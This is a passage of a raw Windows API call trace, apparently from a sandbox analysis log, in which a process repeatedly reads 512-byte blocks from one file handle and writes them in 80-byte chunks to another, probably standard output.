[0112.724] WriteFile (in: hFile=0x4c, lpBuffer=0x28f3d4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f3d4*, lpNumberOfBytesWritten=0x28e3d8*=0x20, lpOverlapped=0x0) returned 1 [0112.724] _get_osfhandle (_FileHandle=4) returned 0x54 [0112.724] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x28e3c4 | out: lpNewFilePointer=0x0) returned 1 [0112.724] _get_osfhandle (_FileHandle=4) returned 0x54 [0112.724] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.724] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.724] GetFileType (hFile=0x4c) returned 0x1 [0112.724] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.724] GetFileType (hFile=0x4c) returned 0x1 [0112.724] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.724] WriteFile (in: hFile=0x4c, lpBuffer=0x28f1f4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.724] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.724] GetFileType (hFile=0x4c) returned 0x1 [0112.724] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.724] WriteFile (in: hFile=0x4c, lpBuffer=0x28f244*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f244*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.725] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.725] GetFileType (hFile=0x4c) returned 0x1 [0112.725] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.725] WriteFile (in: hFile=0x4c, lpBuffer=0x28f294*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f294*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.725] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.725] GetFileType (hFile=0x4c) returned 0x1 [0112.725] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.725] WriteFile (in: hFile=0x4c, lpBuffer=0x28f2e4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f2e4*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.725] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.725] GetFileType (hFile=0x4c) returned 0x1 [0112.725] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.725] WriteFile (in: hFile=0x4c, lpBuffer=0x28f334*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f334*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.725] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.725] GetFileType (hFile=0x4c) returned 0x1 [0112.725] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.725] WriteFile (in: hFile=0x4c, lpBuffer=0x28f384*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f384*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.725] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.725] GetFileType (hFile=0x4c) returned 0x1 [0112.725] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.725] WriteFile (in: hFile=0x4c, lpBuffer=0x28f3d4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f3d4*, lpNumberOfBytesWritten=0x28e3d8*=0x20, lpOverlapped=0x0) returned 1 [0112.725] _get_osfhandle (_FileHandle=4) returned 0x54 [0112.725] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x28e3c4 | out: lpNewFilePointer=0x0) returned 1 [0112.725] _get_osfhandle (_FileHandle=4) returned 0x54 [0112.725] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.725] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.725] GetFileType (hFile=0x4c) returned 0x1 [0112.725] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.725] GetFileType (hFile=0x4c) returned 0x1 [0112.725] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.725] WriteFile (in: hFile=0x4c, lpBuffer=0x28f1f4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.725] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.725] GetFileType (hFile=0x4c) returned 0x1 [0112.725] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.725] WriteFile (in: hFile=0x4c, lpBuffer=0x28f244*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f244*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.725] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.726] GetFileType (hFile=0x4c) returned 0x1 [0112.726] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.726] WriteFile (in: hFile=0x4c, lpBuffer=0x28f294*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f294*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.726] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.726] GetFileType (hFile=0x4c) returned 0x1 [0112.726] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.726] WriteFile (in: hFile=0x4c, lpBuffer=0x28f2e4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f2e4*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.726] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.726] GetFileType (hFile=0x4c) returned 0x1 [0112.726] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.726] WriteFile (in: hFile=0x4c, lpBuffer=0x28f334*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f334*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.726] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.726] GetFileType (hFile=0x4c) returned 0x1 [0112.726] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.726] WriteFile (in: hFile=0x4c, lpBuffer=0x28f384*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f384*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.726] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.726] GetFileType (hFile=0x4c) returned 0x1 [0112.726] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.726] WriteFile (in: hFile=0x4c, lpBuffer=0x28f3d4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f3d4*, lpNumberOfBytesWritten=0x28e3d8*=0x20, lpOverlapped=0x0) returned 1 [0112.726] _get_osfhandle (_FileHandle=4) returned 0x54 [0112.726] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x28e3c4 | out: lpNewFilePointer=0x0) returned 1 [0112.726] _get_osfhandle (_FileHandle=4) returned 0x54 [0112.726] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.726] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.726] GetFileType (hFile=0x4c) returned 0x1 [0112.726] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.726] GetFileType (hFile=0x4c) returned 0x1 [0112.726] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.726] WriteFile (in: hFile=0x4c, lpBuffer=0x28f1f4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.726] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.726] GetFileType (hFile=0x4c) returned 0x1 [0112.726] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.726] WriteFile (in: hFile=0x4c, lpBuffer=0x28f244*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f244*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.726] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.726] GetFileType (hFile=0x4c) returned 0x1 [0112.727] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.727] WriteFile (in: hFile=0x4c, lpBuffer=0x28f294*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f294*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.727] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.727] GetFileType (hFile=0x4c) returned 0x1 [0112.727] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.727] WriteFile (in: hFile=0x4c, lpBuffer=0x28f2e4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f2e4*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.727] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.727] GetFileType (hFile=0x4c) returned 0x1 [0112.727] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.727] WriteFile (in: hFile=0x4c, lpBuffer=0x28f334*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f334*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.727] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.727] GetFileType (hFile=0x4c) returned 0x1 [0112.727] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.727] WriteFile (in: hFile=0x4c, lpBuffer=0x28f384*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f384*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.727] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.727] GetFileType (hFile=0x4c) returned 0x1 [0112.727] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.727] WriteFile (in: hFile=0x4c, lpBuffer=0x28f3d4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f3d4*, lpNumberOfBytesWritten=0x28e3d8*=0x20, lpOverlapped=0x0) returned 1 [0112.727] _get_osfhandle (_FileHandle=4) returned 0x54 [0112.727] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x28e3c4 | out: lpNewFilePointer=0x0) returned 1 [0112.727] _get_osfhandle (_FileHandle=4) returned 0x54 [0112.727] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.727] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.727] GetFileType (hFile=0x4c) returned 0x1 [0112.727] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.727] GetFileType (hFile=0x4c) returned 0x1 [0112.727] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.727] WriteFile (in: hFile=0x4c, lpBuffer=0x28f1f4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.727] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.727] GetFileType (hFile=0x4c) returned 0x1 [0112.727] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.727] WriteFile (in: hFile=0x4c, lpBuffer=0x28f244*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f244*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.727] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.727] GetFileType (hFile=0x4c) returned 0x1 [0112.728] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.728] WriteFile (in: hFile=0x4c, lpBuffer=0x28f294*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f294*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.728] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.728] GetFileType (hFile=0x4c) returned 0x1 [0112.728] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.728] WriteFile (in: hFile=0x4c, lpBuffer=0x28f2e4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f2e4*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.728] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.728] GetFileType (hFile=0x4c) returned 0x1 [0112.728] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.728] WriteFile (in: hFile=0x4c, lpBuffer=0x28f334*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f334*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.728] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.728] GetFileType (hFile=0x4c) returned 0x1 [0112.728] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.728] WriteFile (in: hFile=0x4c, lpBuffer=0x28f384*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f384*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.728] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.728] GetFileType (hFile=0x4c) returned 0x1 [0112.728] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.728] WriteFile (in: hFile=0x4c, lpBuffer=0x28f3d4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f3d4*, lpNumberOfBytesWritten=0x28e3d8*=0x20, lpOverlapped=0x0) returned 1 [0112.728] _get_osfhandle (_FileHandle=4) returned 0x54 [0112.728] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x28e3c4 | out: lpNewFilePointer=0x0) returned 1 [0112.728] _get_osfhandle (_FileHandle=4) returned 0x54 [0112.728] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.728] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.728] GetFileType (hFile=0x4c) returned 0x1 [0112.728] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.728] GetFileType (hFile=0x4c) returned 0x1 [0112.728] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.728] WriteFile (in: hFile=0x4c, lpBuffer=0x28f1f4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.728] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.728] GetFileType (hFile=0x4c) returned 0x1 [0112.728] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.728] WriteFile (in: hFile=0x4c, lpBuffer=0x28f244*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f244*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.728] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.728] GetFileType (hFile=0x4c) returned 0x1 [0112.729] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.729] WriteFile (in: hFile=0x4c, lpBuffer=0x28f294*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f294*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.729] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.729] GetFileType (hFile=0x4c) returned 0x1 [0112.729] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.729] WriteFile (in: hFile=0x4c, lpBuffer=0x28f2e4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f2e4*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.729] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.729] GetFileType (hFile=0x4c) returned 0x1 [0112.729] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.729] WriteFile (in: hFile=0x4c, lpBuffer=0x28f334*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f334*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.729] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.729] GetFileType (hFile=0x4c) returned 0x1 [0112.729] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.729] WriteFile (in: hFile=0x4c, lpBuffer=0x28f384*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f384*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.729] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.729] GetFileType (hFile=0x4c) returned 0x1 [0112.729] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.729] WriteFile (in: hFile=0x4c, lpBuffer=0x28f3d4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f3d4*, lpNumberOfBytesWritten=0x28e3d8*=0x20, lpOverlapped=0x0) returned 1 [0112.729] _get_osfhandle (_FileHandle=4) returned 0x54 [0112.729] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x28e3c4 | out: lpNewFilePointer=0x0) returned 1 [0112.729] _get_osfhandle (_FileHandle=4) returned 0x54 [0112.729] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.729] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.729] GetFileType (hFile=0x4c) returned 0x1 [0112.729] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.729] GetFileType (hFile=0x4c) returned 0x1 [0112.729] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.729] WriteFile (in: hFile=0x4c, lpBuffer=0x28f1f4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.729] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.729] GetFileType (hFile=0x4c) returned 0x1 [0112.729] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.729] WriteFile (in: hFile=0x4c, lpBuffer=0x28f244*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f244*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.729] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.729] GetFileType (hFile=0x4c) returned 0x1 [0112.730] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.730] WriteFile (in: hFile=0x4c, lpBuffer=0x28f294*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f294*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.730] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.730] GetFileType (hFile=0x4c) returned 0x1 [0112.730] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.730] WriteFile (in: hFile=0x4c, lpBuffer=0x28f2e4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f2e4*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.730] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.730] GetFileType (hFile=0x4c) returned 0x1 [0112.730] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.730] WriteFile (in: hFile=0x4c, lpBuffer=0x28f334*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f334*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.730] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.730] GetFileType (hFile=0x4c) returned 0x1 [0112.730] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.730] WriteFile (in: hFile=0x4c, lpBuffer=0x28f384*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f384*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.730] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.730] GetFileType (hFile=0x4c) returned 0x1 [0112.730] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.730] WriteFile (in: hFile=0x4c, lpBuffer=0x28f3d4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f3d4*, lpNumberOfBytesWritten=0x28e3d8*=0x20, lpOverlapped=0x0) returned 1 [0112.730] _get_osfhandle (_FileHandle=4) returned 0x54 [0112.730] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x28e3c4 | out: lpNewFilePointer=0x0) returned 1 [0112.730] _get_osfhandle (_FileHandle=4) returned 0x54 [0112.730] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.730] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.730] GetFileType (hFile=0x4c) returned 0x1 [0112.730] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.730] GetFileType (hFile=0x4c) returned 0x1 [0112.730] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.730] WriteFile (in: hFile=0x4c, lpBuffer=0x28f1f4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.730] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.730] GetFileType (hFile=0x4c) returned 0x1 [0112.730] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.731] WriteFile (in: hFile=0x4c, lpBuffer=0x28f244*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f244*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.731] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.731] GetFileType (hFile=0x4c) returned 0x1 [0112.731] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.731] WriteFile (in: hFile=0x4c, lpBuffer=0x28f294*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f294*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.731] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.731] GetFileType (hFile=0x4c) returned 0x1 [0112.731] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.731] WriteFile (in: hFile=0x4c, lpBuffer=0x28f2e4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f2e4*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.731] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.731] GetFileType (hFile=0x4c) returned 0x1 [0112.731] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.731] WriteFile (in: hFile=0x4c, lpBuffer=0x28f334*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f334*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.731] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.731] GetFileType (hFile=0x4c) returned 0x1 [0112.731] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.731] WriteFile (in: hFile=0x4c, lpBuffer=0x28f384*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f384*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.731] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.731] GetFileType (hFile=0x4c) returned 0x1 [0112.731] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.731] WriteFile (in: hFile=0x4c, lpBuffer=0x28f3d4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f3d4*, lpNumberOfBytesWritten=0x28e3d8*=0x20, lpOverlapped=0x0) returned 1 [0112.731] _get_osfhandle (_FileHandle=4) returned 0x54 [0112.731] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x28e3c4 | out: lpNewFilePointer=0x0) returned 1 [0112.731] _get_osfhandle (_FileHandle=4) returned 0x54 [0112.731] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.731] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.731] GetFileType (hFile=0x4c) returned 0x1 [0112.731] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.731] GetFileType (hFile=0x4c) returned 0x1 [0112.731] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.731] WriteFile (in: 